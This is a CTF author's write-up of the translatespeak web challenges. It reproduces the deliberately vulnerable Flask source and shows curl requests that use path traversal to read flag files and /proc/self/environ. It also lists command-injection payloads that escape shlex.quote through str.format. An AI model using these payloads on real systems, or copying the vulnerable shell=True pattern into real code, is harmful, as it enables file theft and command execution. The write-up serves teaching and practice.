JHtC4BSK translatespeak [web] writeup
This is a writeup of translatespeak{1,2,3} web security related tasks I have prepared for JHtC4BSK CTF that was held mainly for MIMUW students by JHtC.
By the way, if you want to host and solve those tasks on your own, you can do that using docker-compose by cloning this repository and running docker-compose up -d
in the hosted/translatespeak
directory. This requires Docker and docker-compose to be installed on your machine.
Challanges descriptions
translatespeak1 [WEB 100]
Robots are not disallowed if you just need to check some particular endpoints.
http://jhtc4bsk.jhtc.pl:40222/
translatespeak2 [WEB 200]
If you haven't found the source code during translatespeak1, don't start with that.
http://jhtc4bsk.jhtc.pl:40222/
translatespeak3 [WEB 200]
It turned out that translatespeak2 was too easy, so here is the real challenge.
http://jhtc4bsk.jhtc.pl:40222/
–> SPOILER ALERT - scroll down for solutions <–
You should really try doing those by yourself! ;)
Solutions
Basic info
After we got to the page, we can send a string that will be translated from given (source
) language to given (destination
) language.
After submitting translation a synthesized speech sound of the source text is played in english and the sound file can be downloaded by clicking here url:
translatespeak2
The task description says Robots are not disallowed (...)
which suggests a bit to look for robots.txt - which is a file that is used to give instructions about sites to web robots.
So the http://jhtc4bsk.jhtc.pl:40222/robots.txt actually returned a pretty big file which can be seen here. There is a lot of endpoints there with different User-agent
specified.
The idea behind that was to force participants to write a script that would send a GET request to each of those endpoints to find the one that works.
The proper endpoint was /backup
but the User-agent
header (that is sent by the browsers so that server can know which browser you used) was crucial as well.
If one didn’t send User-agent
he got a funny 418 I'M A TEAPOT
response code along with redirect to rick roll’d youtube video:
curl http://jhtc4bsk.jhtc.pl:40222/backup -v
* Trying 138.68.97.247...
* TCP_NODELAY set
* Connected to jhtc4bsk.jhtc.pl (138.68.97.247) port 40222 (#0)
> GET /backup HTTP/1.1
> Host: jhtc4bsk.jhtc.pl:40222
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 418 I'M A TEAPOT
< Server: gunicorn/19.6.0
< Date: Thu, 19 Oct 2017 16:56:37 GMT
< Connection: close
< Content-Type: text/html; charset=utf-8
< Content-Length: 293
< Location: https://www.youtube.com/watch?v=dQw4w9WgXcQ
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ">https://www.youtube.com/watch?v=dQw4w9WgXcQ</a>. If not click the link.
But if one sent proper user-agent - magic
- the one matching for /backup
in robots.txt - e.g. by such curl request:
curl http://jhtc4bsk.jhtc.pl:40222/backup -H User-agent:magic
We got such response (NOTE that the code itself starts with # <!--
and ends with # --!>
- thanks to that, if the response was rendered in the browser the source code hasn’t been displayed as it is between a html comment):
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
# <!--
import os
import shlex
import subprocess
import logging
from uuid import uuid4
from flask import Flask, request, redirect
from googletrans import Translator
logging.basicConfig(level=logging.DEBUG)
app = Flask(__name__)
flag_1 = os.environ['JHtC4BSK_FIRST_FLAG']
base = """
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
"""
hear = """
"""
@app.route('/')
def root():
return base
TMP_PATH = '/tmp'
@app.route('/translate')
def translate():
string = request.args.get('translate')
dst = request.args.get('dst', 'en')
src = request.args.get('src', 'pl')
if string:
string = string[:100]
tr = Translator().translate(string, dest=dst, src=src)
fname = os.path.join(TMP_PATH, str(uuid4()))
try:
cmd = 'espeak --stdout {}'.format(shlex.quote(string))
cmd += ' > {0}'
cmd = cmd.format("'" + fname + "'")
logging.info('Trying to invoke %s' % cmd)
subprocess.check_output(cmd, shell=True, env={})
except Exception as e:
fname = None
raise e
render = base + '<br><br>Translated %s to %s' % (tr.origin, tr.text)
if fname:
render += '<br><br>Download espeak <a href="%s">here</a>' % fname
render += """
<br>
<script>
var audio = new Audio('%s');
audio.play();
</script>
""" % fname
return render
return ''
@app.route(TMP_PATH + '/<filename>')
def tmp(filename):
if 'flag' in filename: # /tmp/flag_2, /tmp/flag_3
return 'lol no'
with open(os.path.join(TMP_PATH, filename), 'rb') as f:
return f.read()
# fake server
@app.route('/robots.txt')
def robots():
return cachedfile(os.path.realpath('robots.txt'))
@app.route('/backup')
def backup():
if request.headers.get('User-Agent') != 'magic':
return redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ', code=418)
filename = request.args.get('fname', os.path.realpath(__file__))
if 'flag_3' in filename:
return 'lol no'
return base + cachedfile(filename)
cache = {}
def cachedfile(fname):
print("Requesting ", fname)
if fname not in cache:
try:
with open(fname) as f:
print('Saving file %s in cache' % fname)
cache[fname] = f.read()
except FileNotFoundError:
return '<!-- File not found, sorry --!>'
return cache[fname]
if __name__ == '__main__':
app.run(debug=True)
# --!>
As we can see one can pass query parameters to the backup
endpoint and so fetch any file - this is a path traversal vulnerability.
There is a suggestion in the code that 2nd and 3rd flags lies in /tmp
and so flag_2 can be fetched using this query parameter:
$ curl http://jhtc4bsk.jhtc.pl:40222/backup?fname=/tmp/flag_2 -H User-agent:magic
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
JHtC4BSK{4w3s0m3_j0b_with_th4t_c0mm4nd_inj3ct1on!}
When I created this task, my initial idea was that it should be solved with a command injection but it turned out I forgot to filter flag_2 from path traversal in the /backup endpoint - that is why we have added flag_3.
translatespeak1
As we could see in the code, the first flag should be located in an environment variable:
flag_1 = os.environ['JHtC4BSK_FIRST_FLAG']
We can actually grab it by exploiting path traversal and getting /proc/self/environ file which contains enviroment variables of the current process:
$ curl jhtc4bsk.jhtc.pl:40222/backup?fname=/proc/self/environ -H User-agent:magic -o output && cat output
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 565 100 565 0 0 565 0 0:00:01 --:--:-- 0:00:01 6726
<form action="/translate">
Translate string:<br>
<input type="text" name="translate" value=""><br/>
Source lang:<br>
<input type="text" name="src" value="pl"><br/>
Dest lang:<br>
<input type="text" name="dst" value="en"><br/>
<input type="submit" value="Submit">
</form>
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=fdf7471e931dJHtC4BSK_FIRST_FLAG=JHtC4BSK{Gr34t_j0b_mr_r0b0t!}LANG=C.UTF-8GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DPYTHON_VERSION=3.6.3PYTHON_PIP_VERSION=9.0.1HOME=/home/jailed
And so we got the flag - JHtC4BSK{Gr34t_j0b_mr_r0b0t!}
.
translatespeak3
The flag_3 has to be retrieved through a command injection vulnerability which is there in /translate endpoint and the string
parameter we send to it:
# this is just the interesting parts of the code
string = request.args.get('translate')
if string:
string = string[:100]
fname = os.path.join(TMP_PATH, str(uuid4()))
try:
cmd = 'espeak --stdout {}'.format(shlex.quote(string))
cmd += ' > {0}'
cmd = cmd.format("'" + fname + "'")
logging.info('Trying to invoke %s' % cmd)
subprocess.check_output(cmd, shell=True, env={})
except Exception as e:
fname = None
raise e
So it turns out that our string is passed to shlex.quote
which should give us some safe string that could be passed to shell:
In [2]: shlex.quote?
Signature: shlex.quote(s)
Docstring: Return a shell-escaped version of the string *s*.
File: /usr/lib/python3.6/shlex.py
Type: function
But… then the string is concatenated with ' > {0}'
and a .format
method is used on it which can be exploited. The point is, one can produce '
character and go out of the quotation produced by shlex.quote
by:
{0[0]}
which exploits the fact that'
is already passed to.format
{0.__doc__[11]}
which is a really interesting and was unintended (unknown for me) way
Some of the solutions:
{0[0]} | cat {0[0]}/tmp/flag_3
- this puts the flag directly into the ‘sound file’ (which isn’t a sound file anymore).{0.__doc__[11]}$(cat /tmp/flag_3 | base64 -w 0 > {0}.hehe){0.__doc__[11]}
- this puts the flag into/tmp/<uuid>.hehe
file which can then be retrieved either by/backup?fname=...
or/tmp/...
endpoints.{0[0]} >/dev/null; espeak --stdout $(cat /tmp/flag_2) -a {0[0]}100
- this makes the service read the flag in english, which is a bit bad, as you don’t know whether the letters are capital and special characters are not read (underscores and exclamation mark)-f/tmp/flag_2
- does the same as above.
Also, someone had a great idea of checking -h
and --help
injections, which just gave out help for espeak :).
And so the flag is JHtC4BSK{hope_that_this_time_you_really_got_it_with_a_command_injection!}
;).
Some random stuff
- The best folk - gorbak - solved all the challenge with just blind command injection - that was awesome.
- I could have removed some of the binaries to make this command injection even harder :P.
- The uploaded files should stay in some unknown path in the filesystem, so people wouldn’t be able to just copy flag to /tmp/ and download it.
- Some of the people tried to brute
/tmp/<1-4 character strings>
just to find flag file produced by other participants - this provoked me to add a cronjob which deleted files from /tmp. - I really should have passed
--
in the espeak command so it would be harder to find out that this is a command injection (if I didn’t make that mistake with flag_2). - It should have played the sound of translated text instead of the one that is going to be translated, but who cares :D.
Comments